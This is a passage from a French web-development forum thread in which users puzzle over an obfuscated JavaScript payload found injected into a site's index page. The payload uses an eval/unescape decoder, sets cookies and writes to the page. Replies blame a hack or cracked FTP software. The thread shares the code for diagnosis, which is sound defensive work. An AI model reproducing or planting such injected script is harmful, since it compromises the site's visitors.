qz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z}`Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4}??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fpZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;ccZ3dZ22Z2568;Z2569Z252b+Z2529Z257btmpZ253dds.Z2573lZ2569ce(Z2569,iZ252b1Z2529;Z2573Z2574Z22;Z69f (Z64ocZ75meZ6eZ74.Z63oZ6fkZ69e.iZ6eZ64eZ78Z4ff(Z27vbuZ6cleZ74Z69nZ5fZ6dulZ74iqZ75otZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbulletinZ5fmulZ74iZ71Z75oteZ3dZ27,2,7Z29;eZ76alZ28uneZ73capZ65(Z64z+cZ7a+opZ2bst)Z2bZ27dw(Z64z+cZ7a(Z24+sZ74))Z3bZ27)}eZ6cseZ7b$Z3dZ27Z27};funcZ74iZ6fn sZ63(Z63nmZ2cv,eZ64Z29Z7bvarZ20Z65xZ64Z3dneZ77 Z44ateZ28)Z3bexZ64Z2esZ65tZ44atZ65(exZ64Z2egZ65tDZ61teZ28Z29+Z65Z64Z29;dZ6fcuZ6denZ74.cZ6foZ6bieZ3dcnZ6d+ Z27Z3dZ27 +escaZ70e(vZ29+Z27;expZ69rZ65sZ3dZ27+exdZ2etoZ47MTSZ74rZ69ng(Z29;}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z" ){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);</script></body>
  2. </html>


 
Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.
 
Merci de votre aide !


 
 
Merci beaucoup..j'ai le meme probleme sur mon forum...a cause de cela, IE7 ne fonctionne plus et seulement Firefox ou Opera..
 
dans quel fichier as tu trouve ce code svp ?

n°1807046
jagstang
Pa Capona ಠ_ಠ
Posté le 31-10-2008 à 18:37:52  profilanswer
 

dans le fichier index... Apparement le site a été hacké.  
 
Je ne peux en dire plus car ça n'était pas mon site
 
url ?


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
mood
Publicité
Posté le 31-10-2008 à 18:37:52  profilanswer
 

n°1807057
buzzyback
Posté le 31-10-2008 à 18:51:36  profilanswer
 

Un gros merci..c'est exactement la qu'il etait..
 
Dan

n°1807065
jagstang
Pa Capona ಠ_ಠ
Posté le 31-10-2008 à 19:01:28  profilanswer
 

une idée de la cause de ce problème ?


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1807067
buzzyback
Posté le 31-10-2008 à 19:04:13  profilanswer
 

non..et je ne comprend pas car le fichier index.php est en mode 0644

n°1807069
jagstang
Pa Capona ಠ_ಠ
Posté le 31-10-2008 à 19:08:23  profilanswer
 

je pense à un éditeur web ou un logiciel ftp cracké qui rajoute ce code dans ta source. Sinon ton site a été hacké (change ton mot de passe...)


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1807388
sircam
I Like Trains
Posté le 02-11-2008 à 09:46:04  profilanswer
 

Un site avec pignon sur rue ne s'abaisserait pas à pop-uper de la pub, et encore moins vers des sites exotiques...  J'ai pas vu la popup de pub par contre, c'est grave? [:dawa]
 
Juste pour le sport, on pourrait essayer de voir en quoi ce site est vulnérable? Ca ne sent déjà pas le vieux phpbb pas patché, c'est plutôt statique, à première vue on ne voit pas de formulaire d'upload (ça n'empêche pas les failles, mais si c'est du développement in-house, c'est pas forcément la porte d'entrée principale pour un hacker).
 
NazzTazz > Si tu as des références, bien entendu, on sera preneurs [:dawa]
 
jagstang > Ton idée de logiciel cracké qui laisse un cadeau n'est pas mauvaise non plus.  :o  
 
Tout cela a de quoi titiller notre saine curiosité [:pingouino]


---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  Code source HTML suspect

 

Sujets relatifs
aide pour corriger un code[C/C++] Choisir sur quel processeur/coeur executer du code
code::blocks, fentre d'erreurs disparueAppel d'une fonction mysql dans du code javascript
extraire les liens d'une page web htmlPHP, MySQL, et HTML avec visual web developper ?
Je n'arrive a pas a compiler avec code blocksProblème De HTML et CSS
"Menu" séparé de mes fichier HTML[résolu]requete http en php, recuperer le code source d'une page web
Plus de sujets relatifs à : Code source HTML suspect


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite) / Groupe LDLC / Shop HFR